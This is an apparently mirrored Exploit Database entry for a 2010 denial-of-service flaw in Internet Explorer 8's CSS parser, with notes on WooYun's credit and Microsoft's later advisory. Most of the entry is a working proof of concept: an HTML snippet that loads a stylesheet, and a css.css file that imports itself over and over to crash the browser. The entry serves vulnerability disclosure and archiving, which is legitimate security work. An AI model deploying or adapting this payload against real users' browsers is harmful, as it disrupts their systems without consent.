Microsoft Internet Explorer 8 – CSS Parser Denial of Service

• Exploit Database
• 114 阅读

• 作者： WooYun
  日期： 2010-12-08
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15708/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

  <code> <div style="position: absolute; top: -999px;left: -999px;"> <link href="https://www.exploit-db.com/exploits/15708/css.css" rel="stylesheet" type="text/css" /> </code>   <code of css.css> *{ color:red; } @import url("css.css"); @import url("css.css"); @import url("css.css"); @import url("css.css"); </code>     Exploit-DB Notes: * Original credit goes to an unidentified researcher using WooYun anonymous account "路人甲". WooYun is a connection platform for vendors and security researchers: http://www.wooyun.org/bugs/wooyun-2010-0885   * Dec 22, 2010 - Microsoft releases security advisory for this vulnerability: http://www.microsoft.com/technet/security/advisory/2488013.mspx